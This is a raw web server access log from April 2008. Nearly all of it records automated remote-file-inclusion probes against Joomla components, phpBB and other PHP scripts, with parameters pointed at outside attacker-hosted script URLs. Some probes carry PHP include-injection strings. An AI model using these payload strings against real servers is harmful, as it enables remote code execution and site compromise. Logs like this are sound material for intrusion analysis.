80.67.24.32 - - [17/Apr/2008:12:18:36 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:12:18:37 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.86.153.39 - - [17/Apr/2008:12:18:50 -0700] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.86.153.39 - - [17/Apr/2008:12:18:53 -0700] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:20:10 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:12:21:20 -0700] "GET /logs/access_080312.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.130.234 - - [17/Apr/2008:12:21:27 -0700] "GET /logs/access_080321.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.usa-westen.info/Fotos/save.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:12:22:19 -0700] "GET /logs/access_080215.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:12:22:20 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:12:22:21 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:12:22:50 -0700] "GET /logs/access.log//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:12:22:51 -0700] "GET //com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:12:22:52 -0700] "GET /logs//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:23:18 -0700] "GET /logs/access_080119.log/classes/core/language.php?rootdir=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:23:18 -0700] "GET /classes/core/language.php?rootdir=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:23:18 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
77.91.224.9 - - [17/Apr/2008:12:23:25 -0700] "GET / HTTP/1.1" 200 11606 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:23:57 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:23:57 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:24:11 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:24:12 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:24:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:24:26 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.47.247.136 - - [17/Apr/2008:12:25:04 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.47.247.136 - - [17/Apr/2008:12:25:24 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:25:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:25:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:25:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:25:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:25:31 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:25:31 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
150.148.0.27 - - [17/Apr/2008:12:25:44 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353&page=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:27:38 -0700] "GET /logs/access_080127.log/index.php?pag=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:27:42 -0700] "GET /index.php?pag=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:27:43 -0700] "GET /logs/index.php?pag=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:27:51 -0700] "GET /logs/access.log/index.php?pag=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:28:46 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:28:46 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:28:46 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:29:25 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:29:25 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:29:26 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:29:52 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:29:52 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:29:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
77.67.5.27 - - [17/Apr/2008:12:30:03 -0700] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.67.5.27 - - [17/Apr/2008:12:30:04 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.7.179 - - [17/Apr/2008:12:30:17 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.115 - - [17/Apr/2008:12:30:21 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 10613 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:30:23 -0700] "GET /logs/access.log/index.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:30:26 -0700] "GET /index.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:30:27 -0700] "GET /logs/index.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.57.43 - - [17/Apr/2008:12:30:27 -0700] "GET //include.php?path[docroot]=http://fourstarpizza.net/media/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.20.57.43 - - [17/Apr/2008:12:30:27 -0700] "GET /logs//include.php?path[docroot]=http://fourstarpizza.net/media/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:08 -0700] "GET /logs/access_080211.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:22 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:22 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:22 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:24 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:24 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:25 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:28 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:31:30 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:31:41 -0700] "GET /logs/access_080211.log/index.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:12:31:54 -0700] "GET /logs/access_080215.log//voir.php?inc=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:12:31:54 -0700] "GET //voir.php?inc=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:12:31:55 -0700] "GET /logs//voir.php?inc=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:12:31:58 -0700] "GET /logs/access_080215.log//voir.php?inc=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:12:31:59 -0700] "GET //voir.php?inc=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:12:31:59 -0700] "GET /logs//voir.php?inc=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:32:10 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:32:10 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:32:10 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:12:32:15 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.55.160.165 - - [17/Apr/2008:12:33:12 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
216.55.160.165 - - [17/Apr/2008:12:33:12 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
89.218.85.18 - - [17/Apr/2008:12:33:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
222.255.3.68 - - [17/Apr/2008:12:34:57 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.255.3.68 - - [17/Apr/2008:12:34:58 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.255.3.68 - - [17/Apr/2008:12:34:59 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.151.85.156 - - [17/Apr/2008:12:35:01 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.85.156 - - [17/Apr/2008:12:35:01 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.85.156 - - [17/Apr/2008:12:35:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [17/Apr/2008:12:35:22 -0700] "GET //include.php?path[docroot]=http://fourstarpizza.net/media/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.20.57.43 - - [17/Apr/2008:12:35:23 -0700] "GET /logs//include.php?path[docroot]=http://fourstarpizza.net/media/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.29.37 - - [17/Apr/2008:12:36:56 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:37:44 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:37:45 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:37:45 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:37:50 -0700] "GET /logs/access_080223.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:37:50 -0700] "GET /logs/access_080223.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:37:50 -0700] "GET /status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:37:50 -0700] "GET /status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:37:50 -0700] "GET /logs/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:37:50 -0700] "GET /logs/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.1.135.201 - - [17/Apr/2008:12:38:09 -0700] "GET /logs/access_080223.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.1.135.201 - - [17/Apr/2008:12:38:09 -0700] "GET /status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.1.135.201 - - [17/Apr/2008:12:38:09 -0700] "GET /logs/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:38:26 -0700] "GET /logs/access_080201.log/index.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:38:28 -0700] "GET /index.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:38:29 -0700] "GET /logs/index.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [17/Apr/2008:12:38:37 -0700] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "dmulk.com"
217.168.112.1 - - [17/Apr/2008:12:38:37 -0700] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 200 11602 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "dmulk.com"
213.246.51.45 - - [17/Apr/2008:12:39:01 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.129.86 - - [17/Apr/2008:12:39:22 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/mail.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
